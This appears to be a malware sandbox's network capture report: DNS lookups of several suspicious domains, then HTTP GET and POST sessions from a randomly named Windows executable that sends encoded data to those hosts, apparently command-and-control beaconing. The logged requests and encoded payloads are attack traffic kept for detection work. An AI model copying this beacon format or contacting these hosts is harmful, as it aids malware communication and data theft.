                                                              Dec 9, 2024 09:12:13.701205969 CET4997380192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:14.340120077 CET4997380192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:14.459527016 CET804997323.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:15.358370066 CET4997980192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:15.477683067 CET804997923.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:15.477799892 CET4997980192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:15.487700939 CET4997980192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:15.606956959 CET804997923.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:16.369808912 CET804997923.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:16.369916916 CET4997980192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:16.371364117 CET4997980192.168.2.423.167.152.41
                                                              Dec 9, 2024 09:12:16.490622044 CET804997923.167.152.41192.168.2.4
                                                              Dec 9, 2024 09:12:22.452389002 CET4999780192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:22.571711063 CET8049997103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:22.571851969 CET4999780192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:22.587277889 CET4999780192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:22.706671953 CET8049997103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:24.090048075 CET4999780192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:24.143306017 CET8049997103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:24.143388033 CET8049997103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:24.143455029 CET4999780192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:24.143471003 CET4999780192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:24.143472910 CET8049997103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:24.143529892 CET4999780192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:24.209475994 CET8049997103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:24.209582090 CET4999780192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:25.108520031 CET5000680192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:25.227979898 CET8050006103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:25.228101015 CET5000680192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:25.243978977 CET5000680192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:25.363338947 CET8050006103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:26.746208906 CET5000680192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:26.804797888 CET8050006103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:26.804862022 CET5000680192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:26.804867983 CET8050006103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:26.804913998 CET8050006103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:26.804920912 CET5000680192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:26.804955959 CET5000680192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:26.865675926 CET8050006103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:26.865792990 CET5000680192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:27.764802933 CET5001280192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:27.884443998 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:27.884557009 CET5001280192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:27.900866032 CET5001280192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:28.020390987 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:28.020406961 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:28.020425081 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:28.020433903 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:28.020565987 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:28.020596027 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:28.020649910 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:28.020658970 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:28.020684004 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:29.402335882 CET5001280192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:29.454633951 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:29.454695940 CET5001280192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:29.521544933 CET8050012103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:30.420886993 CET5001880192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:30.540297985 CET8050018103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:30.540538073 CET5001880192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:30.549448967 CET5001880192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:30.668721914 CET8050018103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:32.109389067 CET8050018103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:32.109437943 CET8050018103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:32.109529972 CET8050018103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:32.109586954 CET5001880192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:32.109633923 CET5001880192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:32.112380028 CET5001880192.168.2.4103.75.185.22
                                                              Dec 9, 2024 09:12:32.231664896 CET8050018103.75.185.22192.168.2.4
                                                              Dec 9, 2024 09:12:37.522342920 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:37.641690016 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:37.641796112 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:37.657143116 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:37.776437044 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:38.888055086 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:38.888160944 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:38.888174057 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:38.888221979 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:38.888446093 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:38.888458967 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:38.888469934 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:38.888493061 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:38.888534069 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:38.889301062 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:38.889312983 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:38.889322042 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:38.889333010 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:38.889349937 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:38.889375925 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:39.008033991 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:39.008058071 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:39.008209944 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:39.012096882 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:39.012177944 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:39.012217045 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:39.020368099 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:39.074126959 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:39.080373049 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:39.080437899 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:39.080482006 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:39.082990885 CET8050024162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:39.083041906 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:39.167825937 CET5002480192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:40.186613083 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:40.308595896 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:40.308677912 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:40.347446918 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:40.466835022 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.548085928 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.548204899 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.548216105 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.548243999 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:41.548430920 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.548444033 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.548455954 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.548468113 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.548474073 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:41.548506975 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:41.549077034 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.549088955 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.549115896 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:41.549331903 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.549374104 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:41.667767048 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.667866945 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.667912006 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:41.671984911 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.672061920 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.672102928 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:41.740274906 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.740324020 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.740362883 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:41.742904902 CET8050025162.0.213.94192.168.2.4
                                                              Dec 9, 2024 09:12:41.742949963 CET5002580192.168.2.4162.0.213.94
                                                              Dec 9, 2024 09:12:42.261692047 CET5002580192.168.2.4162.0.213.94
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 9, 2024 09:10:44.557074070 CET | 60978 | 53 | 192.168.2.4 | 1.1.1.1
Dec 9, 2024 09:10:44.872112989 CET | 53 | 60978 | 1.1.1.1 | 192.168.2.4
Dec 9, 2024 09:11:01.375749111 CET | 59153 | 53 | 192.168.2.4 | 1.1.1.1
Dec 9, 2024 09:11:02.112854004 CET | 53 | 59153 | 1.1.1.1 | 192.168.2.4
Dec 9, 2024 09:11:16.660547018 CET | 64823 | 53 | 192.168.2.4 | 1.1.1.1
Dec 9, 2024 09:11:17.668445110 CET | 64823 | 53 | 192.168.2.4 | 1.1.1.1
Dec 9, 2024 09:11:18.177155972 CET | 53 | 64823 | 1.1.1.1 | 192.168.2.4
Dec 9, 2024 09:11:18.177174091 CET | 53 | 64823 | 1.1.1.1 | 192.168.2.4
Dec 9, 2024 09:11:21.219996929 CET | 57528 | 53 | 192.168.2.4 | 1.1.1.1
Dec 9, 2024 09:11:21.357841015 CET | 53 | 57528 | 1.1.1.1 | 192.168.2.4
Dec 9, 2024 09:11:26.374875069 CET | 60794 | 53 | 192.168.2.4 | 1.1.1.1
Dec 9, 2024 09:11:27.000917912 CET | 53 | 60794 | 1.1.1.1 | 192.168.2.4
Dec 9, 2024 09:11:41.765623093 CET | 51652 | 53 | 192.168.2.4 | 1.1.1.1
Dec 9, 2024 09:11:42.310089111 CET | 53 | 51652 | 1.1.1.1 | 192.168.2.4
Dec 9, 2024 09:11:57.314523935 CET | 49154 | 53 | 192.168.2.4 | 1.1.1.1
Dec 9, 2024 09:11:57.716090918 CET | 53 | 49154 | 1.1.1.1 | 192.168.2.4
Dec 9, 2024 09:12:05.831326962 CET | 53011 | 53 | 192.168.2.4 | 1.1.1.1
Dec 9, 2024 09:12:06.840239048 CET | 53011 | 53 | 192.168.2.4 | 1.1.1.1
Dec 9, 2024 09:12:07.352596998 CET | 53 | 53011 | 1.1.1.1 | 192.168.2.4
Dec 9, 2024 09:12:07.352839947 CET | 53 | 53011 | 1.1.1.1 | 192.168.2.4
Dec 9, 2024 09:12:21.390687943 CET | 60895 | 53 | 192.168.2.4 | 1.1.1.1
Dec 9, 2024 09:12:22.386885881 CET | 60895 | 53 | 192.168.2.4 | 1.1.1.1
Dec 9, 2024 09:12:22.449975014 CET | 53 | 60895 | 1.1.1.1 | 192.168.2.4
Dec 9, 2024 09:12:22.524383068 CET | 53 | 60895 | 1.1.1.1 | 192.168.2.4
Dec 9, 2024 09:12:37.125910044 CET | 57633 | 53 | 192.168.2.4 | 1.1.1.1
Dec 9, 2024 09:12:37.519903898 CET | 53 | 57633 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 9, 2024 09:10:44.557074070 CET | 192.168.2.4 | 1.1.1.1 | 0x9d1d | Standard query (0) | www.supernutra01.online | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:11:01.375749111 CET | 192.168.2.4 | 1.1.1.1 | 0xe90b | Standard query (0) | www.prestigerugz.info | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:11:16.660547018 CET | 192.168.2.4 | 1.1.1.1 | 0x5888 | Standard query (0) | www.buckser.info | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:11:17.668445110 CET | 192.168.2.4 | 1.1.1.1 | 0x5888 | Standard query (0) | www.buckser.info | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:11:21.219996929 CET | 192.168.2.4 | 1.1.1.1 | 0x6f2f | Standard query (0) | www.buckser.info | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:11:26.374875069 CET | 192.168.2.4 | 1.1.1.1 | 0x2fd | Standard query (0) | www.jijievo.site | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:11:41.765623093 CET | 192.168.2.4 | 1.1.1.1 | 0xc1c4 | Standard query (0) | www.44ynh.top | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:11:57.314523935 CET | 192.168.2.4 | 1.1.1.1 | 0xc6e9 | Standard query (0) | www.setwayidiomas.online | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:12:05.831326962 CET | 192.168.2.4 | 1.1.1.1 | 0xa0c9 | Standard query (0) | www.75178.club | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:12:06.840239048 CET | 192.168.2.4 | 1.1.1.1 | 0xa0c9 | Standard query (0) | www.75178.club | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:12:21.390687943 CET | 192.168.2.4 | 1.1.1.1 | 0xcc4f | Standard query (0) | www.taxitayninh365.site | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:12:22.386885881 CET | 192.168.2.4 | 1.1.1.1 | 0xcc4f | Standard query (0) | www.taxitayninh365.site | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:12:37.125910044 CET | 192.168.2.4 | 1.1.1.1 | 0xba7d | Standard query (0) | www.ontherise.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 9, 2024 09:10:44.872112989 CET | 1.1.1.1 | 192.168.2.4 | 0x9d1d | No error (0) | www.supernutra01.online | | 172.67.220.36 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:10:44.872112989 CET | 1.1.1.1 | 192.168.2.4 | 0x9d1d | No error (0) | www.supernutra01.online | | 104.21.24.198 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:11:02.112854004 CET | 1.1.1.1 | 192.168.2.4 | 0xe90b | No error (0) | www.prestigerugz.info | | 217.160.0.113 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:11:18.177155972 CET | 1.1.1.1 | 192.168.2.4 | 0x5888 | Name error (3) | www.buckser.info | none | none | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:11:18.177174091 CET | 1.1.1.1 | 192.168.2.4 | 0x5888 | Name error (3) | www.buckser.info | none | none | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:11:21.357841015 CET | 1.1.1.1 | 192.168.2.4 | 0x6f2f | Name error (3) | www.buckser.info | none | none | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:11:27.000917912 CET | 1.1.1.1 | 192.168.2.4 | 0x2fd | No error (0) | www.jijievo.site | all.wjscdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 09:11:27.000917912 CET | 1.1.1.1 | 192.168.2.4 | 0x2fd | No error (0) | all.wjscdn.com | | 154.90.58.209 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:11:27.000917912 CET | 1.1.1.1 | 192.168.2.4 | 0x2fd | No error (0) | all.wjscdn.com | | 154.205.143.51 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:11:27.000917912 CET | 1.1.1.1 | 192.168.2.4 | 0x2fd | No error (0) | all.wjscdn.com | | 154.205.156.26 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:11:27.000917912 CET | 1.1.1.1 | 192.168.2.4 | 0x2fd | No error (0) | all.wjscdn.com | | 154.205.159.116 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:11:27.000917912 CET | 1.1.1.1 | 192.168.2.4 | 0x2fd | No error (0) | all.wjscdn.com | | 38.54.112.227 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:11:27.000917912 CET | 1.1.1.1 | 192.168.2.4 | 0x2fd | No error (0) | all.wjscdn.com | | 154.90.35.240 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:11:42.310089111 CET | 1.1.1.1 | 192.168.2.4 | 0xc1c4 | No error (0) | www.44ynh.top | 44ynh.top | | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 09:11:42.310089111 CET | 1.1.1.1 | 192.168.2.4 | 0xc1c4 | No error (0) | 44ynh.top | | 38.181.21.178 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:11:57.716090918 CET | 1.1.1.1 | 192.168.2.4 | 0xc6e9 | Server failure (2) | www.setwayidiomas.online | none | none | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:12:07.352596998 CET | 1.1.1.1 | 192.168.2.4 | 0xa0c9 | No error (0) | www.75178.club | uaslkd.skasdhu.huhusddfnsuegcdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 09:12:07.352596998 CET | 1.1.1.1 | 192.168.2.4 | 0xa0c9 | No error (0) | uaslkd.skasdhu.huhusddfnsuegcdn.com | gtml.huksa.huhusddfnsuegcdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 09:12:07.352596998 CET | 1.1.1.1 | 192.168.2.4 | 0xa0c9 | No error (0) | gtml.huksa.huhusddfnsuegcdn.com | | 23.167.152.41 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:12:07.352839947 CET | 1.1.1.1 | 192.168.2.4 | 0xa0c9 | No error (0) | www.75178.club | uaslkd.skasdhu.huhusddfnsuegcdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 09:12:07.352839947 CET | 1.1.1.1 | 192.168.2.4 | 0xa0c9 | No error (0) | uaslkd.skasdhu.huhusddfnsuegcdn.com | gtml.huksa.huhusddfnsuegcdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 09:12:07.352839947 CET | 1.1.1.1 | 192.168.2.4 | 0xa0c9 | No error (0) | gtml.huksa.huhusddfnsuegcdn.com | | 23.167.152.41 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:12:22.449975014 CET | 1.1.1.1 | 192.168.2.4 | 0xcc4f | No error (0) | www.taxitayninh365.site | taxitayninh365.site | | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 09:12:22.449975014 CET | 1.1.1.1 | 192.168.2.4 | 0xcc4f | No error (0) | taxitayninh365.site | | 103.75.185.22 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:12:22.524383068 CET | 1.1.1.1 | 192.168.2.4 | 0xcc4f | No error (0) | www.taxitayninh365.site | taxitayninh365.site | | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 09:12:22.524383068 CET | 1.1.1.1 | 192.168.2.4 | 0xcc4f | No error (0) | taxitayninh365.site | | 103.75.185.22 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 09:12:37.519903898 CET | 1.1.1.1 | 192.168.2.4 | 0xba7d | No error (0) | www.ontherise.top | | 162.0.213.94 | A (IP address) | IN (0x0001) | false
• www.supernutra01.online
• www.prestigerugz.info
• www.jijievo.site
• www.44ynh.top
• www.75178.club
• www.taxitayninh365.site
• www.ontherise.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49758 | 172.67.220.36 | 80 | 5592 | C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:10:45.008107901 CET482OUTGET /q3v1/?_PMl3=z6VH1Hp8JH&X25tIdT0=fC5DX2ZaB+U22tqbLO3TDxU7YJzfDko0GDmIeZjVqXUIxO0lfLVpCEprOw8FFlXlAKcfYmOgw3KJO3baxmfc0E1tB/T88Ahd3/Is7XNEE2gmn05mRDUrFrs= HTTP/1.1
                                                              Host: www.supernutra01.online
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Dec 9, 2024 09:10:46.318923950 CET | 1236 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 09 Dec 2024 08:10:46 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Last-Modified: Tue, 24 Sep 2024 07:18:31 GMT
                                                              Accept-Ranges: bytes
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uhfT6OV463WGfV1odylEkzobWu8ZBn1ZWQNd%2FBdlN7yFbWRMJg%2BOl%2FmYOQNoYl%2BZ8AnwYy4zjPzDNKKzAxJ6LUv9A%2F6SVO280znVWieTP%2FTpa%2FW%2B5mBwaE2jut7sTJlOG%2B1Bx09wOu8ubA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8ef385450a367ca6-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1891&min_rtt=1891&rtt_var=945&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=482&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              1 | 192.168.2.4 | 49797 | 217.160.0.113 | 80 | 5592 | C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 9, 2024 09:11:02.298285961 CET | 753 | OUT | POST /m5si/ HTTP/1.1
                                                              Host: www.prestigerugz.info
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 205
                                                              Origin: http://www.prestigerugz.info
                                                              Referer: http://www.prestigerugz.info/m5si/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Ascii: X25tIdT0=TowXiW7yiZaI+50bV3iKIwsZ8NTKLlySH774ZLEEHnK9J16PPjRS7fWelzRlHXITpq7irjWQDqzLNI6anaIslk/78z/PtvTyycRgpk0KsU5Y8xu6zdwwLvnCm42ycO5tvAHv0zqf2i37cu19HrUCKBOK+ia5zmDgzDa/CduMwTpQStsMvpbgLYuXqEfFGWwFVw==
                                                              Dec 9, 2024 09:11:03.518059969 CET | 780 | IN | HTTP/1.1 404 Not Found
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Date: Mon, 09 Dec 2024 08:11:03 GMT
                                                              Server: Apache
                                                              X-Frame-Options: deny
                                                              Content-Encoding: gzip


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              2 | 192.168.2.4 | 49804 | 217.160.0.113 | 80 | 5592 | C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 9, 2024 09:11:04.963036060 CET | 773 | OUT | POST /m5si/ HTTP/1.1
                                                              Host: www.prestigerugz.info
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 225
                                                              Origin: http://www.prestigerugz.info
                                                              Referer: http://www.prestigerugz.info/m5si/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Ascii: X25tIdT0=TowXiW7yiZaI/a8bShqKOQsaztTKAFyWH734ZKxcH0u9JVKPOgJSyPWe9jRgK3Icpq3ErhCQDqXLNJqantcv/U/5wT/N1PTyycRgpkwwsUhY8im6z8wzIvnB342yL+5pvAHd0yml2g/7cvF9CqUBTxOA6ibl4leKzCv3Ndbj+QBNXrhW+Y63ZYKk3DWxLVNMO9lTC7bYotl6CTP21F2iNxg=
                                                              Dec 9, 2024 09:11:06.236061096 CET | 780 | IN | HTTP/1.1 404 Not Found
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Date: Mon, 09 Dec 2024 08:11:06 GMT
                                                              Server: Apache
                                                              X-Frame-Options: deny
                                                              Content-Encoding: gzip


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              3 | 192.168.2.4 | 49811 | 217.160.0.113 | 80 | 5592 | C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 9, 2024 09:11:07.625307083 CET | 10855 | OUT | POST /m5si/ HTTP/1.1
                                                              Host: www.prestigerugz.info
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 10305
                                                              Origin: http://www.prestigerugz.info
                                                              Referer: http://www.prestigerugz.info/m5si/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
